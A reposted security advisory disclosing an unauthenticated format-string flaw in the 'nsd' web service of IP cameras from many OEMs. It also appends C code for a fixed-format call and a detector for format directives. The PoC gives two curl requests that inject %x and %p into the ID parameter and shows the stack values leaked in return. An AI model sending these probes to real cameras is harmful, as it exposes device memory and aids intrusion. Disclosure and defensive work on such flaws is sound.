nsd Format String

2017.12.18
Credit: bashis
Risk: Medium
Local: Yes
Remote: No
CVE: N/A
CWE: CWE-134

[STX]

Subject: Remote Stack Format String in 'nsd' binary from multiple OEM
Attack vector: Remote
Authentication: Anonymous (no credentials needed)
Researcher: bashis <mcw noemail eu> (December 2017)
PoC: https://github.com/mcw0/PoC
Release date: December 14, 2017
Full Disclosure: 0-Day

-[ PoC ]-

1)
$ curl 'http://[IP:PORT]/main/index.asp?ID=AAAA|%x|%x|%x|%x|%x|%x|%x|%x|%x|%x|%x|%x&lg=BBBB'

[...]
function initHideWidget(){
    document.getElementById("devip").value = "192.168.57.20";
    document.getElementById("cameraid").value = 1;
    document.getElementById("streamid").value = 1;
    document.getElementById("id").value = "AAAA|5e2ff9f8|ffffffff|5e3006db|ea60|1|2|1|1|0|20cd3e0|7263733c|20747069";
    document.getElementById("lg").value = "BBBB";
    document.getElementById("port").value = 60000;
    document.getElementById("ipver").value = 1;
    document.getElementById("tprotocol").value = 2;
    document.getElementById("devtype").value = 1;
    document.getElementById("ismotorize").value = 1;
[...]

Note: 'BBBB' are hiding within '5e3006db'

2)
curl -v "http://[IP:PORT]/Maintain/upgrade.asp?ID=|%p|%p|%p|%p|%p|%p"

[...]
function initHideWidget(){
    document.getElementById("ip").value = "192.168.57.20";
    document.getElementById("id").value = "|0x5d300484|0xffffffff|0xea60|0x1|0x2|0x1";
    document.getElementById("port").value = 60000;
    document.getElementById("ipver").value = 1;
    document.getElementById("tprotocol").value = 2;
    document.getElementById("devtype").value = 1;
[...]

-[ Affected OEM ]-

Huatu I-View IP Camera Web Service Stanley Security 3D Eyes CCTV Platform Protech Srl LS vision GWSECU 12 Legion Solution HDVuk IP Camera Intervid Security Suzuki Tech Wellsite IP Camera iBrido Protec IP Camera Maxtron IP Camera Ascendent GTvs IP Camera Squilla Bikal IP Camera MW Power Alfa Vision KMA Security Tough Dog Security Kpro HQ Lanetwork AFM Vision ZetaDo Jobsight Inc. Datalab IP Technologies 4Tvision Proline UK Tanz Aisonic HD-IP PreSec Security Solution EagleVision Elemis Delta Imenara Gigamedia Xavee Honeywell Boss Security A.R.T Surveillance Global Security Securicorp Securetech Vapplica Star Stic NeXus Alnet Spy Smart Kompsos Adler Security Systems Nextan Access Toprotect Kawah LS StrateX Senpei CCTV Metcom AFM Vision Doron Technologies Saviour Smart IoT Systems Eagle-Eye Faucon.at BlueEagle Security Campro Opple Level One Video and Monitor System K&D

[ETX]
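
Added example (not code from the advisory or from the 'nsd' binary): the PoC output above, where %x and %p in the ID parameter come back as stack values, is what CWE-134 looks like when a request value reaches a printf-family call as the format argument. The C code below shows the hardened call and a check for conversion directives in a decoded parameter value; render_id_line and has_format_directive are hypothetical names, and the sample ID values are constructed.

```c
#include <stdio.h>
#include <string.h>

/* CWE-134 pattern (do not use): snprintf(out, n, id_param);
 * the request value is the format, so "%x" / "%p" are expanded from the stack.
 * Hardened form: fixed format, request value passed only as an argument.
 * Hypothetical handler fragment; escaping for the JavaScript string context
 * is a separate step not shown. Returns length, or -1 on error/truncation. */
int render_id_line(const char *id_param, char *out, size_t n)
{
    int len = snprintf(out, n,
                       "document.getElementById(\"id\").value = \"%s\";",
                       id_param);
    return (len >= 0 && (size_t)len < n) ? len : -1;
}

/* Hypothetical log/WAF check on a decoded parameter value: returns 1 if it
 * holds a printf conversion directive (%x, %p, %08lx, %n ...); "%%" is a
 * literal percent sign and is not counted. */
int has_format_directive(const char *s)
{
    const char *p = s;
    while ((p = strchr(p, '%')) != NULL) {
        p++;
        if (*p == '%') { p++; continue; }
        p += strspn(p, "-+ #0");                    /* flags */
        p += strspn(p, "0123456789*$");             /* width, positional */
        if (*p == '.')
            p += 1 + strspn(p + 1, "0123456789*");  /* precision */
        p += strspn(p, "hlLqjzt");                  /* length modifiers */
        if (*p != '\0' && strchr("diouxXeEfFgGaAcspn", *p) != NULL)
            return 1;
    }
    return 0;
}

int main(void)
{
    /* Constructed sample values for the ID parameter. */
    const char *samples[] = { "AAAA|%x|%x|%x", "|%p|%p", "cam-01", "100%%" };
    char line[256];
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++) {
        render_id_line(samples[i], line, sizeof line);
        printf("%-14s flagged=%d  %s\n", samples[i],
               has_format_directive(samples[i]), line);
    }
    return 0;
}
```

Building the firmware sources with -Wformat -Wformat-security makes GCC and Clang warn on printf-family calls whose format is not a string literal, which is how the flawed call is usually found.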



Copyright 2019, cxsecurity.com